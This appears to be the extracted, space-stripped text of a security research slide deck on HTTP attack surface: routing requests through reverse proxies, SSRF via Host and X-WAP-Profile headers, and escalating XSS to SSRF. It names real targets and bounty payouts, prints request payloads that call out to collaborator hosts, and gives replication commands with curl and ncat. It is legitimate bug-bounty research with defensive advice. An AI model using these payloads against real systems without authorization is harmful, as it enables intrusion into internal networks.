Post on 01-May-2018
CRACKINGTHELENS
JamesKettle
EXPLOITINGHTTP'SHIDDENATTACK-SURFACE
AnUnexpectedPingback– cloud.mail.ru/imgur.com
Pingbackfrombn-proxy1a.ealing.ukcore.bt.net
predator.alien.bt.co.uk
cloud.mail.ru:80(HTTP) cloud.mail.ru:443(HTTPS)258bytes|52millis
Outline
• SpeculativeAttackPipeline•MisroutingRequests
• TargetingAuxiliarySystems
• Demo
• Q&A
Speculative AttackPipeline
• DNSListener• BurpCollaboratorClient•PrivateCollaboratorserverrecommended
• Rollyourown• Canarytokens
Listening
InvitingResponses
• Burpmatch/replace• Nocorrelation
• CollaboratorEverywhere• Masscan• NoHTTP/1.1orSSL/TLS
• ZMap/ZGrab
LazilyAssemblinganAudience
HackerOne BugCrowd
ScopeRegex 3millhosts
DNSDatabase
ProjectSonar
50kwebservers
ipaddress,hostname
Suitabletargetspreadsheet
Profit
MaximizingAttackSurface
GET / HTTP/1.1Host: {host1, host2, host3}X-Forwarded-Proto: {HTTPS, HTTP}Cache-Control: no-transformMax-Forwards: {1, 2, 3}
MisroutingRequests
REVERSEPROXY
PUBLICAPP
INTERNALAPP
MisroutingRequests
GET / HTTP/1.1Host: id.burpcollaborator.net
Exploited:• 27DoDservers• ats-vm.lorax.bf1.yahoo.com•MyISP• ColombianISPdoingDNSpoisoning
ats-vm.lorax.bf1.yahoo.com1/3
ats-vm.lorax.bf1.yahoo.com2/3
ats-vm.lorax.bf1.yahoo.com3/3
+15,000+5,000$20,000
• AllTCP/80traffictoblacklistedIPsgetsproxied• MasksallincomingBTtraffic
• /0traceroute(ttl=10)• Caches,self-hostedsites,speedtests,andblacklistedIPs
InvestigatingIntent- BT
GET/HTTP/1.1Host:www.icefilms.info
HTTP/1.1200OK…<p>Accesstothewebsiteslistedonthispagehasbeenblockedpursuanttoordersofthehighcourt.</p>
GEThttp://104.31.17.3/HTTP/1.1Host:www.icefilms.info
HTTP/1.1200OK…<title>IceFilms.info - QualityDivXMovies</title>
• vk.com pingbackfrom200.89.96.13
• DNSpoisoningimagehosts,socialnetworks
• andbbc.co.uk• Whicharticles?• Perspectives/Convergence• BackslashPoweredDiffing,ETag
InvestigatingIntent- METROTEL
"healthyinternet"
InputMangling
GET / HTTP/1.1Host: vcap.me
GET /vcap.me/vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net
GET / HTTP/1.1Host: ../?x=.vcap.me
GET /vcap.me/../?x=.vcap.meHost: outage.vcap.meVia: o2-b.ycpi.tp2.yahoo.net
+5,000$25,000
AbsoluteURLs
GET http://blah/ HTTP/1.1Host: one.mil
Ifyou'relookingatthisandarenotinthemilitaryorDoDthiswon'tmeananythingtoyou,norwillyoubeabletoaccessit….
Incapsula:hostname:ignoredPort
Backend:http://user:pass@hostname/
AmbiguousExploits- Incapsula
GET / HTTP/1.1Host: incap-client:80@internal.net
ApacheHttpComponents
Url backendURL = "http://backend-server/";String uri = ctx.getRequest().getRawUri();
URI proxyUri = new URIBuilder(uri).setHost(backendURL.getHost()).setPort(backendURL.getPort()) .build();
GET @burpcollab.net/ HTTP/1.1
http://backend-server@burpcollab.net/
GET @burpcollaborator.net/ HTTP/1.1
Service-Gateway-Is-Newrelic-Admin:false
+8,000$33,000
GlobaLeaks
GET xyz.burpcollaborator.net:80/ HTTP/1.1Host: demo.globaleaks.org
SSRFthroughTor
xYZ.BurpcoLLABoRaTOR.neT. from 89.234.157.254Xyz.burPColLABorAToR.nET. from 62.210.18.16xYz.burpColLaBorATOR.net. from 91.224.149.254
ExploitingAuxiliarySystems
PUBLICAPP BACKEND
ATTACKERAPP
"TheX-Wap-ProfileheadershouldcontainaURLpointingtoanXMLdocumentspecifyingthefeaturesofamobiledevice"
Decloaking BackendSystems
GET /?a=f.collab.net&a=f.collab.net HTTP/1.1Host: www.facebook.comX-WAP-Profile: http://a.collab.net/wap.xmlReferer: http://b.collab.net/refX-Forwarded-For: c.collab.netTrue-Client-IP: d.collab.netX-Real-IP: e.collab.netConnection: close
• URL&Redirecthandling• Auto-authentication- Responder.py• ClientHeartbleed– pacemaker.py
• TCP/IPfingerprinting– p0f• SSLciphers,certvalidation
ExploitingRemoteClients
• Pingbackinception• SprayRCEacrossLAN
• Whatifthey'rerendering?• SprayXSSacrossLAN- BlindReflectedServer-SideXSS(BRSSXSS)• XSS/proc/self/environ
• DotheysupportJavaScript?OrCSS?DotheyenforcetheSOP?CanImakepopups?WhataboutFlash?
ExploitingRemoteClients
RenderingEngineHackability Probe
JavaScriptenvironmentdifference:core,__core-js_shared__,System…
• Load<historyofblimps>
• NoteGET/blimps/F-1.pngHTTP/1.1
• Scanningresponseforresourceimports
Pre-emptiveCaching
GET / HTTP/1.1Host: burpcollaborator.net
GET /jquery.js HTTP/1.1GET /wildcat.jpg HTTP/1.1
https://www.history.navy.mil/our-collections/photography/numerical-list-of-images/nhhc-series/nh-series/NH-43000/NH-43487.html
EscalatingXSStoSSRF
REVERSEPROXY
PUBLICAPP
INTERNALAPP
EscalatingXSStoSSRF
ATTACKER PROXY PUBLICAPP INTERNALPOST /XSS.cgi
<img src="http://internal/index.php/a.jpg">
GET /index.php/a.jpg
Sensitive content
GET /index.php/a.jpgHost: internal
Sensitive content
DEMO
• Reverseproxiesaregoingtoproxy• UseaDMZ
• Crawlersareemployeeswithantiquatedbrowsers
• whoclickeverything
• Welcomeresearchers• Haveabugbounty• Don'tforbidautomatedtesting(withcustomtools)
Defense
Replicating
curl -H 'Host: internal' http://example.com/
echo -e 'GET / HTTP/1.1\r\nHost: example.com\r\n' | ncat example.com 80| openssl s_client -ign_eof -connect 7.7.7.7:443
openssl s_client -servername qq.com -ign_eof -connect 7.7.7.7:443
https://github.com/PortSwigger/collaborator-everywherehttps://github.com/PortSwigger/hackability
• ZGrab+Burp Collaboratorintegration
• X-WAP-Profile'sfriends
• Clientexploits
• Toolsforautomatedexploitation(especiallyblindSSRF)
• Untappedattacksurface• Theotherlayer
FurtherResearch
Bugbountiesenablewhitehat researchatscale
LoadbalancersareVPNsforthepublic
Crawlersareemployeeswhoclick
Takeaways
@albinowaxEmail:james.kettle@portswigger.net